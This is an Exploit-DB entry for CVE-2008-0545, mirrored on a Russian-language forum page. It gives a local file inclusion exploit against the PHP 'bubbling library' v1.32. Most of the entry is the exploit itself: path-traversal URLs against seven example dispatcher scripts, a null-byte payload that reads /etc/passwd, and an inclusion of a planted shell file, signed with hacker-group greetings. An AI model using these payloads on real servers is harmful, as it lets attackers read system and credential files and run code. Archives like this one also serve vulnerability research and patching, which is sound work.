- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4991
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0545
- Дата публикации
- 2008-01-26
Код:
## bubbling library v1.32 multiple Local File Inclusion Vulnerabilities
## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730
## Author : Stack-Terrorist [v40]
## Email : [email protected]
## Home : http://www.v4-team.com
## for execute exploit does not write extention of file
## Other files: =../../../../etc/passwd%00
## exploit :
#
# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax
http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]
# examples/dispatcher/framework/simple.php?page=/home/user/shell
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]
Greetz : H-T Team , v4 Team , Tryag , no-hack all my friend
Special tnx for : Houssamix
thx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke
# milw0rm.com [2008-01-26]- Источник
- www.exploit-db.com
